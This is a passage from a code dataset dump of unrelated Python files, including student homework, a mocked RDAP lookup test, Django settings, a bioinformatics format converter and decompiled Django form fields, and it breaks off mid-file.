   try:\n                icons.get_icon_using_name(name=mapping.icon, db_name=dbroute.get_opsview_database(\n                    mapping.opsview_server.ip))\n\n                hostgroups.get_host_group(name=mapping.host_group,\n                                          db_name=dbroute.get_opsview_database(mapping.opsview_server.ip))\n\n                hosttemplates.get_host_template(name=mapping.host_template,\n                                                db_name=dbroute.get_opsview_database(mapping.opsview_server.ip))\n\n                monitoringservers.get_monitoring_server(name=mapping.monitor_by,\n                                                        
db_name=dbroute.get_opsview_database(mapping.opsview_server.ip))\n\n except IconError as ex:\n logger.error(ex)\n error = False\n except HostGroupError as ex:\n logger.error(ex)\n error = False\n except HostTemplateError as ex:\n logger.error(ex)\n error = False\n except MonitoringServerError as ex:\n logger.error(ex)\n error = False\n\n if error is False:\n error_mapping_list.append(mapping)\n logger.error('province: %s, device_type: %s, main_depart: %s' %\n (mapping.province, mapping.device_type, mapping.main_depart))\n\n for row in error_mapping_list:\n logger.error('province: %s, device_type: %s, main_depart: %s' %\n (row.province, row.device_type, row.main_depart))\n\n\n except (PlanningError, OpsviewConnectionNotFound) as ex:\n logger.error(ex)\n","sub_path":"utils/dataload.py","file_name":"dataload.py","file_ext":"py","file_size_in_byte":42989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"168972384","text":"p = 47\nq = 71\n\nn = p * q\nflux = (p - 1) * (q - 1)\neKey = 79\n\n\n# prima gen\nlower = 1 \nupper = 20\nprint(\"Bilangan prima antara\",lower,\"and\",upper,\":\") \n# for num in range(lower,upper + 1): \n# if num > 1: \n# for i in range(2,num): \n# if (num % i) == 0: \n# break \n# else: \n# print(num)\n\nfor num in range(lower , upper + 1):\n if num > 1:\n for i in range(2,num):\n if(num & i) == 0:\n break\n else:\n print(num)\n # bangkitkan key public (e)\n # if i relatif flux:\n \n# bangkitkan nilai e tanpa random\n# !bisa di bagi 1 - 10 termasuk bilangan prima\n# z = 5 % 2\n# print(z)\n# initNilai = 0\n# if()\n# print(p,q,n,flux)\n\n# for i in range(flux):\n# # print(i)\n# if i > 1:\n# # print(i)\n# if (eKey * i) % flux == 1:\n# print(\"nilai\",i)\n\n\n# p = 1019 * 79\n# print(p)\n ","sub_path":"RSA/private.py","file_name":"private.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"223323043","text":"import random\n\ndef play(user):\n print('=' * 20)\n # com choice\n com = random.choice(['r', 'p', 's'])\n\n print(f'You: {get_choice(user)} VS COM: {get_choice(com)}')\n print('=' * 20)\n if user == com:\n return ('t', 'It\\'s a tie') \n if is_win(user, com):\n return ('w', 'You Win!')\n return ('l' ,'You Lost!')\n \ndef is_win(p1, p2):\n if (p1 == 'r' and p2 == 's') or (p1 == 's' and p2 == 'p') or (p1 == 'p' and p2 == 'r'):\n return True\n return False\n\ndef get_choice(choice):\n if choice == 'r':\n return 'Rock'\n if choice == 'p':\n return 'Paper'\n if choice == 's':\n return 'Scissors'\n\nprint('=' * 20)\nprint('Rock Paper Scissors Game')\n\nwin = 0\nlost = 0\ntie = 0\n\nulang = 'y'\nwhile ulang == 'y':\n print('=' * 20)\n user = input('What\\'s your choice ? | rock(r), paper(p), scissors(s) : ').lower()\n if user != 'r' and user != 'p' and user != 's':\n print('Choice Not Found! Please select the right choice!')\n continue\n\n status, msg = play(user)\n\n if status == 'w':\n win += 1\n elif status == 'l':\n lost += 1\n elif status == 't':\n tie += 1\n \n print(msg)\n print('=' * 20)\n print(f'Score (win : lost : tie) | {win} : {lost} : {tie}')\n print('=' * 20)\n ulang = input('Try Again ? 
| yes(y), no(n) : ').lower()","sub_path":"rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"59387532","text":"import pytest\nimport requests_mock\nimport rdap_lookup\n\n\n@pytest.fixture()\ndef response():\n return {\n \"rdapConformance\": [\"rdap_level_0\", \"cidr0\", \"arin_originas0\"],\n \"notices\": [{\n \"title\": \"Terms of Service\",\n \"description\": [\"By using the ARIN RDAP/Whois service, you are agreeing to the RDAP/Whois Terms of Use\"],\n \"links\": [{\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"about\",\n \"type\": \"text/html\",\n \"href\": \"https://www.arin.net/resources/registry/whois/tou/\"\n }]\n }, {\n \"title\": \"Whois Inaccuracy Reporting\",\n \"description\": [\"If you see inaccuracies in the results, please visit: \"],\n \"links\": [{\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"about\",\n \"type\": \"text/html\",\n \"href\": \"https://www.arin.net/resources/registry/whois/inaccuracy_reporting/\"\n }]\n }, {\n \"title\": \"Copyright Notice\",\n \"description\": [\"Copyright 1997-2021, American Registry for Internet Numbers, Ltd.\"]\n }],\n \"handle\": \"NET-8-8-4-0-1\",\n \"startAddress\": \"8.8.4.0\",\n \"endAddress\": \"8.8.4.255\",\n \"ipVersion\": \"v4\",\n \"name\": \"LVLT-GOGL-8-8-4\",\n \"type\": \"ALLOCATION\",\n \"parentHandle\": \"NET-8-0-0-0-1\",\n \"events\": [{\n \"eventAction\": \"last changed\",\n \"eventDate\": \"2014-03-14T16:52:03-04:00\"\n }, {\n \"eventAction\": \"registration\",\n \"eventDate\": \"2014-03-14T16:52:03-04:00\"\n }],\n \"links\": [{\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"self\",\n \"type\": \"application/rdap+json\",\n \"href\": \"https://rdap.arin.net/registry/ip/8.8.4.0\"\n }, {\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"alternate\",\n \"type\": \"application/xml\",\n \"href\": \"https://whois.arin.net/rest/net/NET-8-8-4-0-1\"\n }, {\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"up\",\n \"type\": \"application/rdap+json\",\n \"href\": \"https://rdap.arin.net/registry/ip/8.0.0.0/9\"\n }],\n \"entities\": [{\n \"handle\": \"GOGL\",\n \"vcardArray\": [\"vcard\", [[\"version\", {}, \"text\", \"4.0\"], [\"fn\", {}, \"text\", \"Google LLC\"], [\"adr\", {\n \"label\": \"1600 Amphitheatre Parkway\\nMountain View\\nCA\\n94043\\nUnited States\"\n }, \"text\", [\"\", \"\", \"\", \"\", \"\", \"\", \"\"]], [\"kind\", {}, \"text\", \"org\"]]],\n \"roles\": [\"registrant\"],\n \"remarks\": [{\n \"title\": \"Registration Comments\",\n \"description\": [\n \"Please note that the recommended way to file abuse complaints are located in the following links. 
\",\n \"\", \"To report abuse and illegal activity: https://www.google.com/contact/\", \"\",\n \"For legal requests: http://support.google.com/legal \", \"\", \"Regards, \", \"The Google Team\"]\n }],\n \"links\": [{\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"self\",\n \"type\": \"application/rdap+json\",\n \"href\": \"https://rdap.arin.net/registry/entity/GOGL\"\n }, {\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"alternate\",\n \"type\": \"application/xml\",\n \"href\": \"https://whois.arin.net/rest/org/GOGL\"\n }],\n \"events\": [{\n \"eventAction\": \"last changed\",\n \"eventDate\": \"2019-10-31T15:45:45-04:00\"\n }, {\n \"eventAction\": \"registration\",\n \"eventDate\": \"2000-03-30T00:00:00-05:00\"\n }],\n \"entities\": [{\n \"handle\": \"ABUSE5250-ARIN\",\n \"vcardArray\": [\"vcard\", [[\"version\", {}, \"text\", \"4.0\"], [\"adr\", {\n \"label\": \"1600 Amphitheatre Parkway\\nMountain View\\nCA\\n94043\\nUnited States\"\n }, \"text\", [\"\", \"\", \"\", \"\", \"\", \"\", \"\"]], [\"fn\", {}, \"text\", \"Abuse\"], [\"org\", {}, \"text\", \"Abuse\"],\n [\"kind\", {}, \"text\", \"group\"],\n [\"email\", {}, \"text\", \"network-abuse@google.com\"], [\"tel\", {\n \"type\": [\"work\", \"voice\"]\n }, \"text\", \"+1-650-253-0000\"]]],\n \"roles\": [\"abuse\"],\n \"remarks\": [{\n \"title\": \"Registration Comments\",\n \"description\": [\n \"Please note that the recommended way to file abuse complaints are located in the following links.\",\n \"\", \"To report abuse and illegal activity: https://www.google.com/contact/\", \"\",\n \"For legal requests: http://support.google.com/legal \", \"\", \"Regards,\", \"The Google Team\"]\n }, {\n \"title\": \"Unvalidated POC\",\n \"description\": [\n \"ARIN has attempted to validate the data for this POC, but has received no response from the POC since 2019-10-24\"]\n }],\n \"links\": [{\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"self\",\n \"type\": \"application/rdap+json\",\n \"href\": \"https://rdap.arin.net/registry/entity/ABUSE5250-ARIN\"\n }, {\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"alternate\",\n \"type\": \"application/xml\",\n \"href\": \"https://whois.arin.net/rest/poc/ABUSE5250-ARIN\"\n }],\n \"events\": [{\n \"eventAction\": \"last changed\",\n \"eventDate\": \"2018-10-24T11:23:55-04:00\"\n }, {\n \"eventAction\": \"registration\",\n \"eventDate\": \"2015-11-06T15:36:35-05:00\"\n }],\n \"port43\": \"whois.arin.net\",\n \"objectClassName\": \"entity\"\n }, {\n \"handle\": \"ZG39-ARIN\",\n \"vcardArray\": [\"vcard\", [[\"version\", {}, \"text\", \"4.0\"], [\"adr\", {\n \"label\": \"1600 Amphitheatre Parkway\\nMountain View\\nCA\\n94043\\nUnited States\"\n }, \"text\", [\"\", \"\", \"\", \"\", \"\", \"\", \"\"]], [\"fn\", {}, \"text\", \"Google LLC\"],\n [\"org\", {}, \"text\", \"Google LLC\"], [\"kind\", {}, \"text\", \"group\"],\n [\"email\", {}, \"text\", \"arin-contact@google.com\"], [\"tel\", {\n \"type\": [\"work\", \"voice\"]\n }, \"text\", \"+1-650-253-0000\"]]],\n \"roles\": [\"technical\", \"administrative\"],\n \"links\": [{\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"self\",\n \"type\": \"application/rdap+json\",\n \"href\": \"https://rdap.arin.net/registry/entity/ZG39-ARIN\"\n }, {\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"alternate\",\n \"type\": \"application/xml\",\n \"href\": \"https://whois.arin.net/rest/poc/ZG39-ARIN\"\n 
}],\n \"events\": [{\n \"eventAction\": \"last changed\",\n \"eventDate\": \"2019-10-30T07:05:21-04:00\"\n }, {\n \"eventAction\": \"registration\",\n \"eventDate\": \"2000-11-30T13:54:08-05:00\"\n }],\n \"status\": [\"validated\"],\n \"port43\": \"whois.arin.net\",\n \"objectClassName\": \"entity\"\n }],\n \"port43\": \"whois.arin.net\",\n \"objectClassName\": \"entity\"\n }],\n \"port43\": \"whois.arin.net\",\n \"status\": [\"active\"],\n \"objectClassName\": \"ip network\",\n \"cidr0_cidrs\": [{\n \"v4prefix\": \"8.8.4.0\",\n \"length\": 24\n }],\n \"arin_originas0_originautnums\": []\n }\n\n\ndef test_lookup_info(response):\n ip = \"8.8.4.4\"\n with requests_mock.Mocker() as m:\n m.get(\"https://rdap.arin.net/registry/ip/8.8.4.4/24\", json=response)\n result = rdap_lookup.perform_rdap_lookup([ip], 1)\n assert {ip: response} == result\n","sub_path":"test/test_rdap_lookup.py","file_name":"test_rdap_lookup.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"593144723","text":"## import modules here \n\n################# Question 0 #################\n\ndef add(a, b): # do not change the heading of the function\n return a + b\n\n\n################# Question 1 #################\n\ndef nsqrt(x): # do not change the heading of the function\n #pass # **replace** this line with your code\n i=1\n while abs(i*i-x)>1e-9:\n i=(i+x/i)/2\n #print(i)\n return int(i)\n\n\n################# Question 2 #################\n\n\n# x_0: initial guess\n# EPSILON: stop when abs(x - x_new) < EPSILON\n# MAX_ITER: maximum number of iterations\n\n## NOTE: you must use the default values of the above parameters, do not change them\n\ndef find_root(f, fprime, x_0=1.0, EPSILON = 1E-7, MAX_ITER = 1000): # do not change the heading of the function\n #pass # **replace** this line with your code\n x = x_0\n x_new = x_0\n while MAX_ITER>0:\n x=x_new\n x_new = x - f(x)/fprime(x)\n if abs(x-x_new)0:\n for child in root.children:\n #print(count)\n count_depth(child,count+1,l)\n \ndef max_depth(root): # do not change the heading of the function\n #pass # **replace** this line with your code\n l=[]\n count = 1\n count_depth(root,count,l)\n #print(l)\n return max(l)\n","sub_path":"9318 Dataming and DataWarehouse/Lab/Lab1/Lab1_specs/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"103408776","text":"\"\"\"\nDjango settings for opencpm project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n\nALLOWED_HOSTS = []\n\n# Add request object to template contexts\nfrom django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP\nTEMPLATE_CONTEXT_PROCESSORS = TCP + [\n 'django.core.context_processors.request',\n]\n\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, 'templates'),\n)\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'rest_framework',\n 'notifications',\n\n 'apps.chat',\n 'apps.courses',\n 
'apps.events',\n 'apps.files',\n 'apps.tasks',\n 'apps.users',\n 'apps.user_tracking',\n 'apps.webapp',\n 'apps.stats',\n 'apps.notifications_api',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'apps.user_tracking.middleware.UserTrackingMiddleware',\n 'libs.request_cache.middleware.RequestCacheMiddleware',\n)\n\nROOT_URLCONF = 'opencpm.urls'\n\nWSGI_APPLICATION = 'opencpm.wsgi.application'\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\n# Authentication URLs\nLOGIN_URL = '/app/login'\nLOGIN_REDIRECT_URL = '/app'\n\n# REST framework setup\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.IsAuthenticated',\n 'libs.permissions.rest.ObjectPermissions',\n ),\n 'DEFAULT_FILTER_BACKENDS': (\n 'libs.permissions.rest.ObjectPermissionsFilter',\n 'rest_framework.filters.DjangoFilterBackend',\n 'rest_framework.filters.OrderingFilter'\n ),\n 'PAGINATE_BY_PARAM': 'page_size',\n}\n\n# django-pipeline config\nINSTALLED_APPS += (\n 'pipeline',\n)\n\nSTATICFILES_STORAGE = 'pipeline.storage.PipelineCachedStorage'\nfrom django.conf.global_settings import STATICFILES_FINDERS as STATICFILES_FINDERS_DEFAULT\nSTATICFILES_FINDERS = STATICFILES_FINDERS_DEFAULT + [\n 'pipeline.finders.PipelineFinder',\n]\n\nPIPELINE = {\n 'JS_COMPRESSOR': 'pipeline.compressors.jsmin.JSMinCompressor',\n 'CSS_COMPRESSOR': 'pipeline.compressors.cssmin.CSSMinCompressor',\n 'CSSMIN_BINARY': 'cssmin',\n 'JAVASCRIPT': {\n 'app': {\n 'source_filenames': (\n 'js/app/app.js',\n 'js/app/chat.js',\n 'js/app/custom_filter.js',\n 'js/app/events.js',\n 'js/app/files.js',\n 'js/app/navfilter.js',\n 'js/app/notifications.js',\n 'js/app/repositories.js',\n 'js/app/stats.js',\n 'js/app/tasks.js',\n 'js/app/users.js',\n ),\n 'output_filename': 'js/app.js',\n },\n 'vendor': {\n 'source_filenames': (\n 'bower_components/jquery/dist/jquery.js',\n 'bower_components/underscore/underscore.js',\n 'bower_components/moment/moment.js',\n 'bower_components/fullcalendar/dist/fullcalendar.js',\n 'bower_components/angular/angular.js',\n 'bower_components/angular-cookies/angular-cookies.js',\n 'bower_components/angular-ui-router/release/angular-ui-router.js',\n 'bower_components/angular-bootstrap/ui-bootstrap-tpls.js',\n 'bower_components/angular-ui-indeterminate/dist/indeterminate.js',\n 'bower_components/angular-ui-calendar/src/calendar.js',\n 'bower_components/angular-file-upload/dist/angular-file-upload.js',\n 'bower_components/angular-google-chart/ng-google-chart.js',\n ),\n 'output_filename': 'js/vendor.js',\n }\n },\n 'STYLESHEETS': {\n 'app': {\n 'source_filenames': (\n 'css/bootstrap.css',\n 'bower_components/font-awesome/css/font-awesome.min.css',\n 'css/style.css',\n 'css/style-responsive.css',\n 'bower_components/fullcalendar/dist/fullcalendar.css',\n 'css/app.css',\n ),\n 'output_filename': 'css/app_all.css'\n }\n }\n}\n\n# Other settings\nSITE_NAME = 'OpenCPM'\n\nFILE_THUMBNAIL_CACHE_TIMEOUT = 5*60 # Number of seconds to cache Dropbox 
thumbnails\nFILE_METADATA_CACHE_TIMEOUT = 60*60 # Number of seconds to cache Dropbox file metadata\n\n# Django-RT settings\nRT_SSE_HEARTBEAT = 30\n\n# HACK: this fixes https://github.com/tomchristie/django-rest-framework/issues/2763\nimport django.core.handlers.wsgi as wsgi\nfrom django.utils.six.moves.http_client import responses\nwsgi.STATUS_CODE_TEXT = responses\n","sub_path":"opencpm/settings/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"648598963","text":"#!/usr/bin/env python\n#############################################################################################\n## PhiSpy is a computer program written in C++, Python and R to \n## identify prophages in a complete bacterial genome sequences.\n##\n## Initial versions of PhiSpy were written by\n## Sajia Akhter (sajia@stanford.edu) PhD Student Edwards Bioinformatics Lab \n## (http://edwards.sdsu.edu/labsite/), Computational Science Research Center \n## (http://www.csrc.sdsu.edu/csrc/), San Diego State University (http://www.sdsu.edu/)\n##\n## Improvements, bug fixes, and other changes were made by\n## Katelyn McNair Edwards Bioinformatics Lab (http://edwards.sdsu.edu/labsite/) \n## San Diego State University (http://www.sdsu.edu/)\n## \n## The MIT License (MIT)\n## Copyright (c) 2016 Rob Edwards\n## Permission is hereby granted, free of charge, to any person obtaining a copy\n## of this software and associated documentation files (the \"Software\"), to deal\n## in the Software without restriction, including without limitation the rights\n## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n## copies of the Software, and to permit persons to whom the Software is\n## furnished to do so, subject to the following conditions:\n## \n## The above copyright notice and this permission notice shall be included in all\n## copies or substantial portions of the Software.\n## \n## THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n## SOFTWARE.\n## \n## Improvements, bug fixes and other changes (2019) were made by forking the github version: \n## - Conversion from python2 -> python3\n## - Add prophage.tbl\n## - Simplification of code and integration into BacterialGenotyper\n##\n#############################################################################################\n\"\"\"\nConvert a tab file from PATRIC to a the SEED files that we need for PhiSpy\n\nWe need the following files:\n\n1. assigned_functions - a tab separated list of FIG ID and function\n2. contigs - the fasta DNA sequence. Note we may download this separately\n3. genome - the name of the genome -- may not be required\n4. taxonomy - the taxonomy of the genome -- may not be required\n5. taxonomy_id - the tax id. -- also may not be required\n6. Features/peg/tbl - the tbl that has id,contig_start_stop, [alt ids]\n7. Features/rna/tbl - the RNA genes\n\n\nThe files that PhiSpy opens are:\n\na. dir/contigs\nb. dir/Features/peg/tbl\nc. dir/assigned_functions\nd. 
dir/Features/rna/tbl\n\n\n\"\"\"\n\nimport os\nimport sys\nimport argparse\n\n#################################################\ndef parse_tab(filename, outputdir):\n\t\"\"\"\n\tParse a patric tab file\n\t:param filename: the file to parse\n\t:return: None; the SEED files are written into outputdir\n\t\"\"\"\n\n\tif not (os.path.exists(os.path.join(outputdir, \"Features\"))):\n\t\tos.mkdir(os.path.join(outputdir, \"Features\"))\n\tif not (os.path.exists(os.path.join(outputdir, \"Features/peg\"))):\n\t\tos.mkdir(os.path.join(outputdir, \"Features/peg\"))\n\tif not (os.path.exists(os.path.join(outputdir, \"Features/rna\"))):\n\t\tos.mkdir(os.path.join(outputdir, \"Features/rna\"))\n\n\tpeg = open(os.path.join(outputdir, \"Features/peg/tbl\"), 'w')\n\trna = open(os.path.join(outputdir, \"Features/rna/tbl\"), 'w')\n\tasf = open(os.path.join(outputdir, \"assigned_functions\"), 'w')\n\n\twrote_genome = False\n\n\twith open(filename, 'r') as fin:\n\t\tfor l in fin:\n\t\t\tif l.startswith('genome_id'):\n\t\t\t\tcontinue\n\n\t\t\t# genome_id\tgenome_name\taccession\tannotation\tfeature_type\tpatric_id\trefseq_locus_tag\talt_locus_tag\n\t\t\t# uniprotkb_accession\tstart\tend\tstrand\tna_length\tgene\tproduct\tfigfam_id\tplfam_id\tpgfam_id\n\t\t\t# go\tec\tpathway\n\t\t\tl = l.replace(\"\\n\", \"\") # this is a hack because I can't figure out how to do chomp\n\t\t\tp = l.split(\"\\t\")\n\n\t\t\tif not wrote_genome:\n\t\t\t\twith open(os.path.join(outputdir, \"GENOME\"), 'w') as gout:\n\t\t\t\t\tgout.write(\"{}\\n\".format(p[1]))\n\t\t\t\twrote_genome = True\n\n\t\t\tgid, name, acc, who, ftype, fid, refseq_locus, alt, uni, start, stop, strand, length, gene, prod, ffid, plid, pgid, go, ec, pw = p\n\n\t\t\tif int(start) > int(stop):  # start/stop are strings from the split, so compare numerically\n\t\t\t\t(start, stop) = (stop, start)\n\n\t\t\tif \"CDS\" in p[4]:\n\t\t\t\tpeg.write(\"{}\\t{}_{}_{}\\n\".format(fid, acc, start, stop))\n\t\t\t\tasf.write(\"{}\\t{}\\n\".format(fid, prod))\n\t\t\telif \"rna\" in p[4].lower():\n\t\t\t\trna.write(\"{}\\t{}_{}_{}\\n\".format(fid, acc, start, stop))\n\tpeg.close()\n\trna.close()\n\tasf.close()\n\n#################################################\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description=\"Convert a patric tab file to a minimal seed directory\")\n\tparser.add_argument('-f', help='The patric tab file', required=True)\n\tparser.add_argument('-o', help='output directory', required=True)\n\tparser.add_argument('-v', help='verbose output', action=\"store_true\")\n\targs = parser.parse_args()\n\n\tif not os.path.exists(args.o):\n\t\tos.mkdir(args.o)\n\n\tparse_tab(args.f, args.o)\n","sub_path":"PhiSpy_tools/tab2seed.py","file_name":"tab2seed.py","file_ext":"py","file_size_in_byte":5152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"468107136","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/rmartins/Desenvolvimento/Django/Apps/wagtaildemo/smart_selects/form_fields.py\n# Compiled at: 2016-01-06 07:19:32\ntry:\n    from django.apps import apps\n    get_model = apps.get_model\nexcept ImportError:\n    from django.db.models.loading import get_model\n\nfrom django.forms.models import ModelChoiceField, ModelMultipleChoiceField\nfrom django.forms import ChoiceField\nfrom smart_selects.widgets import ChainedSelect, ChainedSelectMultiple\nfrom django.utils.encoding import force_text\nimport traceback\n\nclass ChainedModelChoiceField(ModelChoiceField):\n\n    def __init__(self, 
to_app_name, to_model_name, chained_field, chained_model_field, foreign_key_app_name, foreign_key_model_name, foreign_key_field_name, show_all, auto_choose, manager=None, initial=None, view_name=None, *args, **kwargs):\n defaults = {'widget': ChainedSelect(to_app_name, to_model_name, chained_field, chained_model_field, foreign_key_app_name, foreign_key_model_name, foreign_key_field_name, show_all, auto_choose, manager, view_name)}\n defaults.update(kwargs)\n if 'queryset' not in kwargs:\n queryset = get_model(to_app_name, to_model_name).objects.all()\n super(ChainedModelChoiceField, self).__init__(queryset=queryset, initial=initial, *args, **defaults)\n else:\n super(ChainedModelChoiceField, self).__init__(initial=initial, *args, **defaults)\n\n def _get_choices(self):\n self.widget.queryset = self.queryset\n choices = super(ChainedModelChoiceField, self)._get_choices()\n return choices\n\n choices = property(_get_choices, ChoiceField._set_choices)\n\n\nclass ChainedManyToManyField(ModelMultipleChoiceField):\n\n def __init__(self, to_app_name, to_model_name, chain_field, chained_model_field, foreign_key_app_name, foreign_key_model_name, foreign_key_field_name, auto_choose, manager=None, initial=None, *args, **kwargs):\n defaults = {'widget': ChainedSelectMultiple(to_app_name, to_model_name, chain_field, chained_model_field, foreign_key_app_name, foreign_key_model_name, foreign_key_field_name, auto_choose, manager)}\n defaults.update(kwargs)\n if 'queryset' not in kwargs:\n queryset = get_model(to_app_name, to_model_name).objects.all()\n super(ChainedManyToManyField, self).__init__(queryset=queryset, initial=initial, *args, **defaults)\n else:\n super(ChainedManyToManyField, self).__init__(initial=initial, *args, **defaults)\n\n\nclass GroupedModelSelect(ModelChoiceField):\n\n def __init__(self, queryset, order_field, *args, **kwargs):\n self.order_field = order_field\n super(GroupedModelSelect, self).__init__(queryset, *args, **kwargs)\n\n def _get_choices(self):\n if hasattr(self, '_choices'):\n return self._choices\n group_indexes = {}\n choices = [\n (\n '', self.empty_label or '---------')]\n i = len(choices)\n for item in self.queryset:\n order_field = getattr(item, self.order_field)\n group_index = order_field.pk\n if group_index not in group_indexes:\n group_indexes[group_index] = i\n choices.append([force_text(order_field), []])\n i += 1\n choice_index = group_indexes[group_index]\n choices[choice_index][1].append(self.make_choice(item))\n\n return choices\n\n def make_choice(self, obj):\n return (\n obj.pk, ' ' + self.label_from_instance(obj))\n\n choices = property(_get_choices, ChoiceField._set_choices)","sub_path":"pycfiles/wagtail-smart-selects-1.2.0.tar/form_fields.py","file_name":"form_fields.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"62505877","text":"# Polygon Figure plotting function\n# Charles Hill\n# 16/05/18\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.collections import PolyCollection\n\ndef Gauss_sum(x, params):\n y = np.zeros_like(x)\n for i in range(0, len(params), 3):\n ctr = params[i]\n amp = params[i+1]\n wid = params[i+2]\n y = y + amp * np.exp( -((x - ctr)/wid)**2)\n return y\n\ndef Polygon_figure(Conc,popt,step=0.0001,Con_lim=(0,0.01),G_max=600):\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n idx = np.arange(0,len(Conc),1)\n popt = np.array(popt)\n verts 
= []\n\n    for z, i in zip(Conc,idx):\n        x = np.arange(Con_lim[0],Con_lim[1],step)\n        y = Gauss_sum(x,popt[i][:])\n        verts.append(list(zip(x,y))) # generates a list of (x,y) tuples for each Concentration\n\n    poly = PolyCollection(verts)\n    poly.set_alpha(0.7) # Sets the transparency of the polygon plots\n    ax.add_collection3d(poly, zs=Conc, zdir='y')\n\n    ax.set_xlabel('Contrast')\n    ax.set_xlim3d(Con_lim[0],Con_lim[1])\n    ax.set_ylabel('Concentration')\n    ax.set_ylim3d(Conc[0]-10,Conc[-1]+10)\n    ax.set_zlabel('Gaussian')\n    ax.set_zlim3d(0, G_max)\n\n    plt.show()\n\n    return","sub_path":"Poly_Fig.py","file_name":"Poly_Fig.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"406802300","text":"\"\"\"\n2. Write two algorithms that find the i-th prime number.\nWithout using the Sieve of Eratosthenes;\nUsing the Sieve of Eratosthenes.\nNote for the whole homework: analyse the speed and complexity of the algorithms. Save the results of the analysis\nas comments in the file with the code.\n\"\"\"\n\n\nimport cProfile\n\norder_num = int(input('input num: '))\na = [n for n in range(2, order_num * 9)]\n\n\ndef simple_nums():\n    print('Without the Sieve of Eratosthenes')\n\n    b = []\n    for i in range(2, len(a)):\n        count = 0\n        for j in range(2, i):\n            if i % j == 0:\n                break\n        else:\n            b.append(i)\n\n    print(f'{b}, \\n{b[order_num - 1]}')\n\n\ndef simple_num_ero():\n    print('Using the Sieve of Eratosthenes')\n\n    a = [n for n in range(0, order_num * 9)]\n    a[1] = 0\n\n    i = 2\n    while i < len(a):\n        if a[i] != 0:\n            j = i * 2\n            while j < len(a):\n                a[j] = 0\n                j += i\n        i += 